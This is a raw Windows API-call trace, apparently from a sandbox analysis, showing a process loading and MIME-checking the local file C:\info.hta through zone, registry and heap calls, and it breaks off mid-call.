0x0 [0223.678] IUnknown:AddRef (This=0x5bbf0c) returned 0x3 [0223.678] IUri:GetPropertyDWORD (in: This=0x5bbf0c, uriProp=0x11, pdwProperty=0x1ef254, dwFlags=0x0 | out: pdwProperty=0x1ef254*=0x9) returned 0x0 [0223.678] IUnknown:Release (This=0x5bbf0c) returned 0x2 [0223.766] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x2c) returned 0x5ad7a8 [0223.766] IInternetSecurityManager:GetSecurityId (in: This=0x5c35a8, pwszUrl="file:///C:/info.hta", pbSecurityId=0x1ef2b8, pcbSecurityId=0x1ef2b4*=0x200, dwReserved=0x0 | out: pbSecurityId=0x1ef2b8*=0x66, pcbSecurityId=0x1ef2b4*=0x9) returned 0x0 [0223.766] IInternetSecurityManager:GetSecurityId (in: This=0x744796bc, pwszUrl="file:///C:/info.hta", pbSecurityId=0x1ef2b8, pcbSecurityId=0x1ef2b4*=0x200, dwReserved=0x0 | out: pbSecurityId=0x1ef2b8*=0x0, pcbSecurityId=0x1ef2b4*=0x200) returned 0x800c0011 [0223.775] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x5ad7a8 | out: hHeap=0x590000) returned 1 [0223.775] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x5bdc80 | out: hHeap=0x590000) returned 1 [0223.775] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x9) returned 0x5bdc80 [0223.775] ParseURLW (in: pcszURL="file:///C:/info.hta", ppu=0x1ef470 | out: ppu=0x1ef470) returned 0x0 [0223.775] GetDC (hWnd=0x0) returned 0xffffffffab0101eb [0223.775] CreateCompatibleBitmap (hdc=0xab0101eb, cx=1, cy=1) returned 0xa0506b7 [0223.775] GetDIBits (in: hdc=0xab0101eb, hbm=0xa0506b7, start=0x0, cLines=0x1, lpvBits=0x0, lpbmi=0x1ef040, usage=0x0 | out: lpvBits=0x0, lpbmi=0x1ef040) returned 1 [0223.775] GetDIBits (in: hdc=0xab0101eb, hbm=0xa0506b7, start=0x0, cLines=0x1, lpvBits=0x0, lpbmi=0x1ef040, usage=0x0 | out: lpvBits=0x0, lpbmi=0x1ef040) returned 1 [0223.776] DeleteObject (ho=0xa0506b7) returned 1 [0223.776] GetSysColor (nIndex=0) returned 0xc8c8c8 [0223.776] GetSysColor (nIndex=1) returned 0x0 [0223.776] GetSysColor (nIndex=2) returned 0xd1b499 [0223.776] GetSysColor (nIndex=3) returned 0xdbcdbf [0223.776] GetSysColor (nIndex=4) returned 0xf0f0f0 [0223.776] GetSysColor (nIndex=5) returned 0xffffff [0223.776] GetSysColor (nIndex=6) returned 0x646464 [0223.776] GetSysColor (nIndex=7) returned 0x0 [0223.776] GetSysColor (nIndex=8) returned 0x0 [0223.776] GetSysColor (nIndex=9) returned 0x0 [0223.776] GetSysColor (nIndex=10) returned 0xb4b4b4 [0223.776] GetSysColor (nIndex=11) returned 0xfcf7f4 [0223.776] GetSysColor (nIndex=12) returned 0xababab [0223.776] GetSysColor (nIndex=13) returned 0xff9933 [0223.776] GetSysColor (nIndex=14) returned 0xffffff [0223.776] GetSysColor (nIndex=15) returned 0xf0f0f0 [0223.777] GetSysColor (nIndex=16) returned 0xa0a0a0 [0223.777] GetSysColor (nIndex=17) returned 0x6d6d6d [0223.777] GetSysColor (nIndex=18) returned 0x0 [0223.777] GetSysColor (nIndex=19) returned 0x544e43 [0223.777] GetSysColor (nIndex=20) returned 0xffffff [0223.777] GetSysColor (nIndex=21) returned 0x696969 [0223.777] GetSysColor (nIndex=22) returned 0xe3e3e3 [0223.777] GetSysColor (nIndex=23) returned 0x0 [0223.777] GetSysColor (nIndex=24) returned 0xe1ffff [0223.777] GetSysColor (nIndex=25) returned 0x0 [0223.777] GetSysColor (nIndex=26) returned 0xcc6600 [0223.777] GetSysColor (nIndex=27) returned 0xead1b9 [0223.777] GetSysColor (nIndex=28) returned 0xf2e4d7 [0223.777] GetSysColor (nIndex=29) returned 0xff9933 [0223.777] GetSysColor (nIndex=30) returned 0xf0f0f0 [0223.777] GetSysColor (nIndex=31) returned 0x0 [0223.777] GetSysColor (nIndex=32) returned 0x0 [0223.777] GetSysColor (nIndex=33) returned 0x0 [0223.777] GetSysColor (nIndex=34) returned 0x0 [0223.777] GetSysColor (nIndex=35) returned 0x0 [0223.777] GetSysColor (nIndex=36) returned 0x0 [0223.777] GetSysColor (nIndex=37) returned 0x0 [0223.777] GetSysColor (nIndex=38) returned 0x0 [0223.777] GetSysColor (nIndex=39) returned 0x0 [0223.777] GetSysColor (nIndex=40) returned 0x0 [0223.777] GetSysColor (nIndex=41) returned 0x0 [0223.777] GetSysColor (nIndex=42) returned 0x0 [0223.777] GetSysColor (nIndex=43) returned 0x0 [0223.778] GetSysColor (nIndex=44) returned 0x0 [0223.778] GetSysColor (nIndex=45) returned 0x0 [0223.778] GetSysColor (nIndex=46) returned 0x0 [0223.778] GetSysColor (nIndex=47) returned 0x0 [0223.778] GetSysColor (nIndex=48) returned 0x0 [0223.778] GetSysColor (nIndex=49) returned 0x0 [0223.778] GetSysColor (nIndex=50) returned 0x0 [0223.778] GetSysColor (nIndex=51) returned 0x0 [0223.778] GetSysColor (nIndex=52) returned 0x0 [0223.778] GetSysColor (nIndex=53) returned 0x0 [0223.778] GetSysColor (nIndex=54) returned 0x0 [0223.778] GetSysColor (nIndex=55) returned 0x0 [0223.778] GetSysColor (nIndex=56) returned 0x0 [0223.778] GetSysColor (nIndex=57) returned 0x0 [0223.778] GetSysColor (nIndex=58) returned 0x0 [0223.778] GetSysColor (nIndex=59) returned 0x0 [0223.778] GetSysColor (nIndex=60) returned 0x0 [0223.778] GetSysColor (nIndex=61) returned 0x0 [0223.778] GetSysColor (nIndex=62) returned 0x0 [0223.778] GetSysColor (nIndex=63) returned 0x0 [0223.778] GetDeviceCaps (hdc=0xab0101eb, index=38) returned 32409 [0223.781] ReleaseDC (hWnd=0x0, hDC=0xab0101eb) returned 1 [0223.781] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x50) returned 0x5cdef0 [0223.781] GetCursorPos (in: lpPoint=0x1ef2c0 | out: lpPoint=0x1ef2c0*(x=751, y=143)) returned 1 [0223.781] GetKeyState (nVirtKey=16) returned 0 [0223.781] GetKeyState (nVirtKey=17) returned 0 [0223.781] GetKeyState (nVirtKey=18) returned 0 [0223.781] GetKeyState (nVirtKey=160) returned 0 [0223.782] GetKeyState (nVirtKey=162) returned 0 [0223.782] GetKeyState (nVirtKey=164) returned 0 [0223.782] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x30) returned 0x5ad7a8 [0223.782] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x28) returned 0x5d0728 [0223.782] GetProcAddress (hModule=0x76340000, lpProcName=0x8) returned 0x76343ed5 [0223.782] GetCurrentThreadId () returned 0x36c [0223.782] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x5ad7a8 | out: hHeap=0x590000) returned 1 [0223.782] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x2c) returned 0x5ad7a8 [0223.782] ParseURLW (in: pcszURL="file:///C:/info.hta", ppu=0x1ef460 | out: ppu=0x1ef460) returned 0x0 [0223.782] CreateUri (in: pwzURI="file:///C:/info.hta", dwFlags=0x2b84, dwReserved=0x0, ppURI=0x1ef444 | out: ppURI=0x1ef444*=0x5bbf0c) returned 0x0 [0223.782] IUnknown:AddRef (This=0x5bbf0c) returned 0x5 [0223.782] IInternetSecurityManager:MapUrlToZone (in: This=0x744796bc, pwszUrl="file:///C:/info.hta", pdwZone=0x1ef3e4, dwFlags=0x0 | out: pdwZone=0x1ef3e4*=0xffffffff) returned 0x800c0011 [0223.783] CoInternetIsFeatureEnabled (FeatureEntry=0x8, dwFlags=0x2) returned 0x1 [0223.783] CoInternetIsFeatureEnabled (FeatureEntry=0x8, dwFlags=0x2) returned 0x1 [0223.783] CoInternetIsFeatureEnabled (FeatureEntry=0xe, dwFlags=0x2) returned 0x1 [0223.783] IInternetSecurityManager:ProcessUrlAction (in: This=0x744796bc, pwszUrl="file:///C:/info.hta", dwAction=0x2700, pPolicy=0x1ef3e8, cbPolicy=0x4, pContext=0x0, cbContext=0x0, dwFlags=0x41, dwReserved=0x0 | out: pPolicy=0x1ef3e8*=0x0) returned 0x0 [0223.783] CoInternetIsFeatureEnabled (FeatureEntry=0x8, dwFlags=0x2) returned 0x1 [0223.783] IUnknown:Release (This=0x5bbf0c) returned 0x4 [0223.783] IUnknown:Release (This=0x5bbf0c) returned 0x3 [0223.783] IUnknown:AddRef (This=0x5bbf0c) returned 0x4 [0223.783] IUri:GetPropertyDWORD (in: This=0x5bbf0c, uriProp=0x11, pdwProperty=0x1ef21c, dwFlags=0x0 | out: pdwProperty=0x1ef21c*=0x9) returned 0x0 [0223.783] IUnknown:Release (This=0x5bbf0c) returned 0x3 [0223.783] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x2c) returned 0x5ad850 [0223.784] IInternetSecurityManager:GetSecurityId (in: This=0x5c35a8, pwszUrl="file:///C:/info.hta", pbSecurityId=0x1ef278, pcbSecurityId=0x1ef274*=0x200, dwReserved=0x0 | out: pbSecurityId=0x1ef278*=0x66, pcbSecurityId=0x1ef274*=0x9) returned 0x0 [0223.784] IInternetSecurityManager:GetSecurityId (in: This=0x744796bc, pwszUrl="file:///C:/info.hta", pbSecurityId=0x1ef278, pcbSecurityId=0x1ef274*=0x200, dwReserved=0x0 | out: pbSecurityId=0x1ef278*=0x0, pcbSecurityId=0x1ef274*=0x200) returned 0x800c0011 [0223.784] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x5ad850 | out: hHeap=0x590000) returned 1 [0223.784] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x590000) returned 1 [0223.784] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x9) returned 0x5cf140 [0223.784] CoInternetGetSession (in: dwSessionMode=0x0, ppIInternetSession=0x1ef49c, dwReserved=0x0 | out: ppIInternetSession=0x1ef49c*=0x5c5628) returned 0x0 [0223.784] IInternetSession:RegisterNameSpace (This=0x5c5628, pCF=0x74478c50, rclsid=0x74079790, pwzProtocol="res", cPatterns=0x0, ppwzPatterns=0x0, dwReserved=0x0) returned 0x0 [0223.784] IUnknown:AddRef (This=0x74478c50) returned 0x1 [0223.784] IInternetSession:RegisterNameSpace (This=0x5c5628, pCF=0x74478c70, rclsid=0x74079780, pwzProtocol="about", cPatterns=0x0, ppwzPatterns=0x0, dwReserved=0x0) returned 0x0 [0223.784] IUnknown:AddRef (This=0x74478c70) returned 0x1 [0223.784] StrCmpICW (pszStr1="file:///C:/info.hta", pszStr2="res://ieframe.dll/PhishSite.htm") returned -12 [0223.785] IUnknown:QueryInterface (in: This=0x5bbbac, riid=0x740fd6e8*(Data1=0x50295b0c, Data2=0x6b79, Data3=0x4935, Data4=([0]=0xae, [1]=0xd8, [2]=0x5, [3]=0xd8, [4]=0xe, [5]=0xc8, [6]=0x6a, [7]=0x60)), ppvObject=0x1ef40c | out: ppvObject=0x1ef40c*=0x5bbbac) returned 0x0 [0223.785] IUnknown:Release (This=0x5bbbac) returned 0x9 [0223.785] IUnknown:AddRef (This=0x5bbbac) returned 0xa [0223.785] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x12c) returned 0x5d1360 [0223.785] IUnknown:AddRef (This=0x5bbbac) returned 0xb [0223.785] IUnknown:QueryInterface (in: This=0x5bbbac, riid=0x740fd6e8*(Data1=0x50295b0c, Data2=0x6b79, Data3=0x4935, Data4=([0]=0xae, [1]=0xd8, [2]=0x5, [3]=0xd8, [4]=0xe, [5]=0xc8, [6]=0x6a, [7]=0x60)), ppvObject=0x1ef3d0 | out: ppvObject=0x1ef3d0*=0x5bbbac) returned 0x0 [0223.785] IUnknown:Release (This=0x5bbbac) returned 0xb [0223.785] IUnknown:AddRef (This=0x5bbbac) returned 0xc [0223.785] IUnknown:Release (This=0x5bbbac) returned 0xb [0223.785] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x3c) returned 0x5a4128 [0223.785] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0xb4) returned 0x5d1498 [0223.785] IUri:GetScheme (in: This=0x5bbbac, pdwScheme=0x1ef454 | out: pdwScheme=0x1ef454*=0x9) returned 0x0 [0223.785] IUri:IsEqual (in: This=0x5bbf0c, pUri=0x5bbbac, pfEqual=0x1ef49c | out: pfEqual=0x1ef49c*=1) returned 0x0 [0223.785] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x590000) returned 1 [0223.785] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x4c) returned 0x5cdf48 [0223.785] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x12) returned 0x5b36c0 [0223.785] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x60) returned 0x5d1558 [0223.786] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x30) returned 0x5ad888 [0223.786] PostMessageW (hWnd=0x20168, Msg=0x8002, wParam=0x0, lParam=0x0) returned 1 [0223.786] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x12c) returned 0x5d15c0 [0223.786] IUnknown:AddRef (This=0x5bbbac) returned 0xc [0223.786] IUnknown:QueryInterface (in: This=0x5bbbac, riid=0x740fd6e8*(Data1=0x50295b0c, Data2=0x6b79, Data3=0x4935, Data4=([0]=0xae, [1]=0xd8, [2]=0x5, [3]=0xd8, [4]=0xe, [5]=0xc8, [6]=0x6a, [7]=0x60)), ppvObject=0x1ef3f0 | out: ppvObject=0x1ef3f0*=0x5bbbac) returned 0x0 [0223.786] IUnknown:Release (This=0x5bbbac) returned 0xc [0223.786] IUnknown:AddRef (This=0x5bbbac) returned 0xd [0223.786] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x4c) returned 0x5cdfa0 [0223.786] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x68) returned 0x5d16f8 [0223.786] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x108) returned 0x5d1768 [0223.786] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x10) returned 0x5cf158 [0223.786] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0xcc) returned 0x5bc5c0 [0223.786] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x10) returned 0x5cf0e0 [0223.786] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x30) returned 0x5ad8c0 [0223.786] IUnknown:QueryInterface (in: This=0x5bbbac, riid=0x740fd6e8*(Data1=0x50295b0c, Data2=0x6b79, Data3=0x4935, Data4=([0]=0xae, [1]=0xd8, [2]=0x5, [3]=0xd8, [4]=0xe, [5]=0xc8, [6]=0x6a, [7]=0x60)), ppvObject=0x1ef0f4 | out: ppvObject=0x1ef0f4*=0x5bbbac) returned 0x0 [0223.786] IUnknown:Release (This=0x5bbbac) returned 0xd [0223.786] IUnknown:AddRef (This=0x5bbbac) returned 0xe [0223.786] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x590000) returned 1 [0223.786] IUnknown:AddRef (This=0x5bbbac) returned 0xf [0223.786] IUnknown:AddRef (This=0x5bbbac) returned 0x10 [0223.786] IUnknown:QueryInterface (in: This=0x5bbbac, riid=0x740fd6e8*(Data1=0x50295b0c, Data2=0x6b79, Data3=0x4935, Data4=([0]=0xae, [1]=0xd8, [2]=0x5, [3]=0xd8, [4]=0xe, [5]=0xc8, [6]=0x6a, [7]=0x60)), ppvObject=0x1ef0e8 | out: ppvObject=0x1ef0e8*=0x5bbbac) returned 0x0 [0223.786] IUnknown:Release (This=0x5bbbac) returned 0x10 [0223.786] IUnknown:AddRef (This=0x5bbbac) returned 0x11 [0223.786] IUri:GetScheme (in: This=0x5bbbac, pdwScheme=0x5d1980 | out: pdwScheme=0x5d1980*=0x9) returned 0x0 [0223.786] IMoniker:IsSystemMoniker (in: This=0x5a0570, pdwMksys=0x1ef150 | out: pdwMksys=0x1ef150*=0x6) returned 0x0 [0223.787] CoInternetParseIUri (in: pIUri=0x5bbbac, ParseAction=0x9, dwFlags=0x0, pwzResult=0x1ef160, cchResult=0x104, pcchResult=0x1ef104, dwReserved=0x0 | out: pwzResult="C:\\info.hta", pcchResult=0x1ef104) returned 0x0 [0223.787] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x1c) returned 0x5bab38 [0223.787] FindFirstFileW (in: lpFileName="C:\\info.hta", lpFindFileData=0x1eee90 | out: lpFindFileData=0x1eee90) returned 0x5cf280 [0223.788] FindClose (in: hFindFile=0x5cf280 | out: hFindFile=0x5cf280) returned 1 [0223.789] IUnknown:QueryInterface (in: This=0x5bbbac, riid=0x740fd6e8*(Data1=0x50295b0c, Data2=0x6b79, Data3=0x4935, Data4=([0]=0xae, [1]=0xd8, [2]=0x5, [3]=0xd8, [4]=0xe, [5]=0xc8, [6]=0x6a, [7]=0x60)), ppvObject=0x1ef0f4 | out: ppvObject=0x1ef0f4*=0x5bbbac) returned 0x0 [0223.789] IUnknown:Release (This=0x5bbbac) returned 0x11 [0223.789] IUnknown:AddRef (This=0x5bbbac) returned 0x12 [0223.793] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x10) returned 0x5cf0f8 [0223.793] IInternetSession:CreateBinding (in: This=0x5c5628, pbc=0x0, szUrl="file:///C:/info.hta", pUnkOuter=0x0, ppunk=0x0, ppOInetProt=0x5cf100, dwOption=0x0 | out: ppunk=0x0, ppOInetProt=0x5cf100*=0x5d1ef0) returned 0x0 [0223.794] IUnknown:QueryInterface (in: This=0x5d1ef0, riid=0x74096078*(Data1=0x53c84785, Data2=0x8425, Data3=0x4dc5, Data4=([0]=0x97, [1]=0x1b, [2]=0xe5, [3]=0x8d, [4]=0x9c, [5]=0x19, [6]=0xf9, [7]=0xb6)), ppvObject=0x1ef078 | out: ppvObject=0x1ef078*=0x0) returned 0x80004002 [0223.794] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x1ef014 | out: phkResult=0x1ef014*=0x1b4) returned 0x0 [0223.794] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x1ef018 | out: phkResult=0x1ef018*=0x1bc) returned 0x0 [0223.794] RegOpenKeyExW (in: hKey=0x1bc, lpSubKey="FEATURE_XSSFILTER", ulOptions=0x0, samDesired=0x1, phkResult=0x1eefd4 | out: phkResult=0x1eefd4*=0x0) returned 0x2 [0223.794] RegOpenKeyExW (in: hKey=0x1b4, lpSubKey="FEATURE_XSSFILTER", ulOptions=0x0, samDesired=0x1, phkResult=0x1eefd4 | out: phkResult=0x1eefd4*=0x1c0) returned 0x0 [0223.794] SHRegGetValueW () returned 0x2 [0223.794] SHRegGetValueW () returned 0x2 [0223.794] RegCloseKey (hKey=0x1c0) returned 0x0 [0223.794] RegCloseKey (hKey=0x0) returned 0x6 [0223.794] RegCloseKey (hKey=0x0) returned 0x6 [0223.794] RegCloseKey (hKey=0x1b4) returned 0x0 [0223.794] RegCloseKey (hKey=0x1bc) returned 0x0 [0223.794] IUnknown:AddRef (This=0x5d1ef0) returned 0x2 [0223.794] IUnknown:QueryInterface (in: This=0x5d1ef0, riid=0x74096158*(Data1=0xc7a98e66, Data2=0x1010, Data3=0x492c, Data4=([0]=0xa1, [1]=0xc8, [2]=0xc8, [3]=0x9, [4]=0xe1, [5]=0xf7, [6]=0x59, [7]=0x5)), ppvObject=0x1ef0bc | out: ppvObject=0x1ef0bc*=0x5d1ef0) returned 0x0 [0223.795] IInternetProtocolEx:StartEx (This=0x5d1ef0, pUri=0x5bbbac, pOIProtSink=0x5d18cc, pOIBindInfo=0x5d1894, grfPI=0x10, dwReserved=0x0) returned 0x0 [0223.795] IUnknown:AddRef (This=0x5d18cc) returned 0x3 [0223.795] IUnknown:AddRef (This=0x5d1894) returned 0x4 [0223.795] IUnknown:QueryInterface (in: This=0x5d1894, riid=0x75326f40*(Data1=0xa3e015b7, Data2=0xa82c, Data3=0x4dcd, Data4=([0]=0xa1, [1]=0x50, [2]=0x56, [3]=0x9a, [4]=0xee, [5]=0xed, [6]=0x36, [7]=0xab)), ppvObject=0x1ef064 | out: ppvObject=0x1ef064*=0x0) returned 0x80004002 [0223.795] IInternetBindInfo:GetBindInfo (in: This=0x5d1894, grfBINDF=0x5d2060, pbindinfo=0x5d2068 | out: grfBINDF=0x5d2060*=0x20083, pbindinfo=0x5d2068) returned 0x0 [0223.795] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x1eefc0 | out: phkResult=0x1eefc0*=0x1bc) returned 0x0 [0223.795] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x1eefc4 | out: phkResult=0x1eefc4*=0x1b4) returned 0x0 [0223.795] RegOpenKeyExW (in: hKey=0x1b4, lpSubKey="FEATURE_SHOW_FAILED_CONNECT_CONTENT_KB942615", ulOptions=0x0, samDesired=0x1, phkResult=0x1eef80 | out: phkResult=0x1eef80*=0x0) returned 0x2 [0223.795] RegOpenKeyExW (in: hKey=0x1bc, lpSubKey="FEATURE_SHOW_FAILED_CONNECT_CONTENT_KB942615", ulOptions=0x0, samDesired=0x1, phkResult=0x1eef80 | out: phkResult=0x1eef80*=0x0) returned 0x2 [0223.795] RegCloseKey (hKey=0x0) returned 0x6 [0223.795] RegCloseKey (hKey=0x0) returned 0x6 [0223.795] RegCloseKey (hKey=0x1bc) returned 0x0 [0223.795] RegCloseKey (hKey=0x1b4) returned 0x0 [0223.795] IUnknown:AddRef (This=0x5d18cc) returned 0x5 [0223.853] IInternetProtocolSink:ReportProgress (This=0x5d18cc, ulStatusCode=0xb, szStatusText="") returned 0x0 [0223.853] IInternetProtocolSink:ReportProgress (This=0x5d18cc, ulStatusCode=0xe, szStatusText="C:\\info.hta") returned 0x0 [0223.853] GetCurrentProcessId () returned 0x124 [0223.854] IInternetProtocolSink:ReportProgress (This=0x5d18cc, ulStatusCode=0xd, szStatusText="application/hta") returned 0x0 [0223.854] RegisterClipboardFormatA (lpszFormat="text/html") returned 0xc11f [0223.854] RegisterClipboardFormatA (lpszFormat="text/plain") returned 0xc120 [0223.854] RegisterClipboardFormatA (lpszFormat="text/x-component") returned 0xc150 [0223.854] RegisterClipboardFormatA (lpszFormat="image/gif") returned 0xc12b [0223.854] RegisterClipboardFormatA (lpszFormat="image/jpeg") returned 0xc12d [0223.854] RegisterClipboardFormatA (lpszFormat="image/pjpeg") returned 0xc12c [0223.854] RegisterClipboardFormatA (lpszFormat="image/bmp") returned 0xc131 [0223.854] RegisterClipboardFormatA (lpszFormat="image/x-jg") returned 0xc132 [0223.854] RegisterClipboardFormatA (lpszFormat="image/x-art") returned 0xc133 [0223.854] RegisterClipboardFormatA (lpszFormat="image/x-wmf") returned 0xc135 [0223.854] RegisterClipboardFormatA (lpszFormat="image/x-emf") returned 0xc134 [0223.854] RegisterClipboardFormatA (lpszFormat="video/avi") returned 0xc137 [0223.854] RegisterClipboardFormatA (lpszFormat="video/x-msvideo") returned 0xc138 [0223.854] RegisterClipboardFormatA (lpszFormat="video/mpeg") returned 0xc139 [0223.854] RegisterClipboardFormatA (lpszFormat="video/quicktime") returned 0xc151 [0223.854] RegisterClipboardFormatA (lpszFormat="application/hta") returned 0xc152 [0223.854] RegisterClipboardFormatA (lpszFormat="image/x-png") returned 0xc12f [0223.854] RegisterClipboardFormatA (lpszFormat="image/png") returned 0xc130 [0223.855] RegisterClipboardFormatA (lpszFormat="image/x-icon") returned 0xc136 [0223.855] StrCmpICW (pszStr1="application/hta", pszStr2="text/xml") returned -19 [0223.855] StrCmpNICW (lpStr1="applicat", lpStr2="text/css", nChar=8) returned -19 [0223.855] IInternetProtocolSink:ReportData (This=0x5d18cc, grfBSCF=0x5, ulProgress=0x200a, ulProgressMax=0x200a) returned 0x0 [0223.855] IUnknown:QueryInterface (in: This=0x5d1ef0, riid=0x740b9460*(Data1=0x79eac9d8, Data2=0xbafa, Data3=0x11ce, Data4=([0]=0x8c, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0xa9, [7]=0xb)), ppvObject=0x1ed58c | out: ppvObject=0x1ed58c*=0x0) returned 0x80004002 [0223.855] IUnknown:QueryInterface (in: This=0x5d1ef0, riid=0x74034588*(Data1=0x79eac9d6, Data2=0xbafa, Data3=0x11ce, Data4=([0]=0x8c, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0xa9, [7]=0xb)), ppvObject=0x1ed584 | out: ppvObject=0x1ed584*=0x0) returned 0x80004002 [0223.855] IInternetProtocolSink:ReportResult (This=0x5d18cc, hrResult=0x0, dwError=0x0, szResult=0x0) returned 0x0 [0223.855] IUnknown:Release (This=0x5d1ef0) returned 0x2 [0223.855] IUnknown:Release (This=0x5bbbac) returned 0x13 [0223.855] IUnknown:Release (This=0x5bbbac) returned 0x12 [0223.855] IUnknown:Release (This=0x5bbbac) returned 0x11 [0223.855] CoTaskMemFree (pv=0x0) [0223.855] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x1a8) returned 0x5d1a30 [0223.856] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x1ef3a8 | out: lpCPInfo=0x1ef3a8) returned 1 [0223.856] IUnknown:AddRef (This=0x5c5628) returned 0x3 [0223.856] IUnknown:AddRef (This=0x5bbbac) returned 0x12 [0223.856] IUnknown:QueryInterface (in: This=0x5bbbac, riid=0x740fd6e8*(Data1=0x50295b0c, Data2=0x6b79, Data3=0x4935, Data4=([0]=0xae, [1]=0xd8, [2]=0x5, [3]=0xd8, [4]=0xe, [5]=0xc8, [6]=0x6a, [7]=0x60)), ppvObject=0x1ef3b0 | out: ppvObject=0x1ef3b0*=0x5bbbac) returned 0x0 [0223.856] IUnknown:Release (This=0x5bbbac) returned 0x12 [0223.856] IUnknown:AddRef (This=0x5bbbac) returned 0x13 [0223.856] IUri:GetScheme (in: This=0x5bbbac, pdwScheme=0x1ef3b4 | out: pdwScheme=0x1ef3b4*=0x9) returned 0x0 [0223.856] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x7406e718, lpParameter=0x5d1be0, dwCreationFlags=0x0, lpThreadId=0x5d1bf4 | out: lpThreadId=0x5d1bf4*=0x354) returned 0xa8 [0223.857] GetCurrentThreadId () returned 0x36c [0223.857] GetCurrentThreadId () returned 0x36c [0223.857] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x28) returned 0x5d07b8 [0223.857] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x590000) returned 1 [0223.857] MulDiv (nNumber=8202, nNumerator=4000, nDenominator=8202) returned 4000 [0223.857] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x2c) returned 0x5ad8f8 [0223.857] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x128) returned 0x5d31a0 [0223.857] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x10) returned 0x5a4738 [0223.857] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x1c) returned 0x5d23c0 [0223.858] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x100) returned 0x5d32d0 [0223.858] IInternetProtocol:Read (in: This=0x5d1ef0, pv=0x5d32dc, cb=0xc8, pcbRead=0x1ef2f8 | out: pv=0x5d32dc, pcbRead=0x1ef2f8*=0xc8) returned 0x0 [0223.858] CoInternetIsFeatureEnabledForUrl (FeatureEntry=0x3, dwFlags=0x2, szURL="file:///C:/info.hta", pSecMgr=0x0) returned 0x1 [0223.858] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x1ef280 | out: phkResult=0x1ef280*=0xb0) returned 0x0 [0223.858] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x1ef284 | out: phkResult=0x1ef284*=0x1c8) returned 0x0 [0223.858] RegOpenKeyExW (in: hKey=0x1c8, lpSubKey="FEATURE_MIME_TREAT_IMAGE_AS_AUTHORITATIVE", ulOptions=0x0, samDesired=0x1, phkResult=0x1ef240 | out: phkResult=0x1ef240*=0x0) returned 0x2 [0223.859] RegOpenKeyExW (in: hKey=0xb0, lpSubKey="FEATURE_MIME_TREAT_IMAGE_AS_AUTHORITATIVE", ulOptions=0x0, samDesired=0x1, phkResult=0x1ef240 | out: phkResult=0x1ef240*=0x0) returned 0x2 [0223.859] RegCloseKey (hKey=0x0) returned 0x6 [0223.859] RegCloseKey (hKey=0x0) returned 0x6 [0223.859] RegCloseKey (hKey=0xb0) returned 0x0 [0223.859] RegCloseKey (hKey=0x1c8) returned 0x0 [0223.859] FindMimeFromData (in: pBC=0x0, pwzUrl="C:\\info.hta", 